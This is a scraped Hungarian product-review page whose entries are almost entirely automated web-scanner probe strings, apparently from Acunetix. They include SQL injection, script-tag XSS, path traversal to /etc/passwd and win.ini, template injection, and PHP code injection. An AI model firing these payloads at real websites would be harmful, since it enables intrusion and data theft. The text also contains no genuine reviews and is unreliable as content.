-1" OR 2+924-924-1=0+0+0+1 --
qqmwmacm 2020-08-15 17:27:13
Értékelés:
-1' OR 2+296-296-1=0+0+0+1 or 'xGh5xoYA'='
brdpmper 2020-08-15 17:27:12
Értékelés:
acux7382
qqmwmacm 2020-08-15 17:27:07
Értékelés:
-1' OR 2+359-359-1=0+0+0+1 --
qqmwmacm 2020-08-15 17:27:02
Értékelés:
-1 OR 2+724-724-1=0+0+0+1
qqmwmacm 2020-08-15 17:26:59
Értékelés:
-1 OR 2+718-718-1=0+0+0+1 --
qqmwmacm 2020-08-15 17:26:57
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!
qqmwmacm 2020-08-15 17:26:56
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!
brdpmper 2020-08-15 17:26:56
Értékelés:
acu7006<s1﹥s2ʺs3ʹuca7006
brdpmper 2020-08-15 17:26:50
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!9466825
brdpmper 2020-08-15 17:26:39
Értékelés:
'"()&%<acx><ScRiPt >UOGE(9809)</ScRiPt>
brdpmper 2020-08-15 17:26:21
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!'"()&%<acx><ScRiPt >UOGE(9040)</ScRiPt>
soryohro 2020-08-15 17:25:19
Értékelés:
Írj véleményt a termékről!
WEB-INF\web.xml 2020-08-15 17:25:18
Értékelés:
Írj véleményt a termékről!
WEB-INF/web.xml 2020-08-15 17:25:13
Értékelés:
Írj véleményt a termékről!
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini 2020-08-15 17:24:57
Értékelés:
Írj véleményt a termékről!
lsfapbpu 2020-08-15 17:24:57
Értékelés:
Írj véleményt a termékről!
..\..\..\..\..\..\..\..\windows\win.ini 2020-08-15 17:24:54
Értékelés:
Írj véleményt a termékről!
................windowswin.ini 2020-08-15 17:24:52
Értékelés:
Írj véleményt a termékről!
{{9999984*10000372}} 2020-08-15 17:24:51
Értékelés:
Írj véleményt a termékről!
grmeekid 2020-08-15 17:24:50
Értékelés:
grmeekid 2020-08-15 17:24:48
Értékelés:
../../../../../../../../../../windows/win.ini.jpg 2020-08-15 17:24:47
Értékelés:
Írj véleményt a termékről!
grmeekid 2020-08-15 17:24:45
Értékelés:
JyI=
C:\WINDOWS\system32\drivers\etc\hosts 2020-08-15 17:24:44
Értékelés:
Írj véleményt a termékről!
grmeekid 2020-08-15 17:24:43
Értékelés:
@@HgxMx
../../../../../../../../../../windows/win.ini 2020-08-15 17:24:42
Értékelés:
Írj véleményt a termékről!
grmeekid 2020-08-15 17:24:41
Értékelés:
1
WEB-INF\web.xml 2020-08-15 17:24:40
Értékelés:
Írj véleményt a termékről!
/WEB-INF/web.xml 2020-08-15 17:24:38
Értékelés:
Írj véleményt a termékről!
grmeekid 2020-08-15 17:24:38
Értékelés:
\
grmeekid 2020-08-15 17:24:37
Értékelés:
1'"
WEB-INF/web.xml 2020-08-15 17:24:36
Értékelés:
Írj véleményt a termékről!
acux10962 2020-08-15 17:24:35
Értékelés:
Írj véleményt a termékről!
/\../\../\../\../\../\../\../etc/passwd 2020-08-15 17:24:34
Értékelés:
Írj véleményt a termékről!
grmeekid 2020-08-15 17:24:34
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!
file:///etc/passwd 2020-08-15 17:24:32
Értékelés:
Írj véleményt a termékről!
qqmwmacm 2020-08-15 17:24:30
Értékelés:
Írj véleményt a termékről!
.. 2020-08-15 17:24:28
Értékelés:
Írj véleményt a termékről!
qqmwmacm 2020-08-15 17:24:27
Értékelés:
Írj véleményt a termékről!
acu4060<s1﹥s2ʺs3ʹuca4060 2020-08-15 17:24:24
Értékelés:
Írj véleményt a termékről!
%2fetc%2fpasswd 2020-08-15 17:24:19
Értékelés:
Írj véleményt a termékről!
lhqrtskf9781459 2020-08-15 17:24:18
Értékelés:
Írj véleményt a termékről!
/etc/passwd 2020-08-15 17:24:15
Értékelés:
Írj véleményt a termékről!
grmeekid 2020-08-15 17:24:15
Értékelés:
Írj véleményt a termékről!
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd 2020-08-15 17:24:13
Értékelés:
Írj véleményt a termékről!
lhqrtskf'"()&% 2020-08-15 17:24:12
Értékelés:
Írj véleményt a termékről!
../../../../../../../../../../etc/passwd.jpg 2020-08-15 17:24:07
Értékelés:
Írj véleményt a termékről!
lhqrtskf 2020-08-15 17:24:02
Értékelés:
Írj véleményt a termékről!
npmbbqtl 2020-08-15 17:24:00
Értékelés:
reishi---ganoderma-lucidum/.
npmbbqtl 2020-08-15 17:23:58
Értékelés:
reishi---ganoderma-lucidum
npmbbqtl 2020-08-15 17:23:56
Értékelés:
reishi---ganoderma-lucidum
../../../../../../../../../../etc/passwd 2020-08-15 17:23:55
Értékelés:
Írj véleményt a termékről!
lhqrtskf 2020-08-15 17:23:55
Értékelés:
Írj véleményt a termékről!
utdkuwwn 2020-08-15 17:23:55
Értékelés:
<!--
utdkuwwn 2020-08-15 17:23:52
Értékelés:
'"
grmeekid 2020-08-15 17:23:52
Értékelés:
Írj véleményt a termékről!
ffpeavwl 2020-08-15 17:23:51
Értékelés:
Írj véleményt a termékről!
npmbbqtl 2020-08-15 17:23:51
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!
2020-08-15 17:23:50
Értékelés:
Írj véleményt a termékről!
ffpeavwl 2020-08-15 17:23:50
Értékelés:
Írj véleményt a termékről!
2020-08-15 17:23:48
Értékelés:
Írj véleményt a termékről!
lhqrtskf 2020-08-15 17:23:48
Értékelés:
Írj véleményt a termékről!
kxjtcsch 2020-08-15 17:23:48
Értékelés:
${@print(md5(acunetix_wvs_security_test))}\
ffpeavwl 2020-08-15 17:23:47
Értékelés:
Írj véleményt a termékről!
wsprnvqd 2020-08-15 17:23:44
Értékelés:
Írj véleményt a termékről!
kxjtcsch 2020-08-15 17:23:44
Értékelés:
${@print(md5(acunetix_wvs_security_test))}
JyI= 2020-08-15 17:23:43
Értékelés:
Írj véleményt a termékről!
ffpeavwl 2020-08-15 17:23:42
Értékelés:
Írj véleményt a termékről!
@@LZHBB 2020-08-15 17:23:41
Értékelés:
Írj véleményt a termékről!
wsprnvqd 2020-08-15 17:23:40
Értékelés:
Írj véleményt a termékről!
kxjtcsch 2020-08-15 17:23:40
Értékelés:
";print(md5(acunetix_wvs_security_test));$a="
ffpeavwl 2020-08-15 17:23:39
Értékelés:
Írj véleményt a termékről!
ffpeavwl 2020-08-15 17:23:38
Értékelés:
Írj véleményt a termékről!
kxjtcsch 2020-08-15 17:23:38
Értékelés:
';print(md5(acunetix_wvs_security_test));$a='
npmbbqtl 2020-08-15 17:23:37
Értékelés:
Írj véleményt a termékről!
kxjtcsch 2020-08-15 17:23:36
Értékelés:
;print(md5(acunetix_wvs_security_test));
1 2020-08-15 17:23:36
Értékelés:
Írj véleményt a termékről!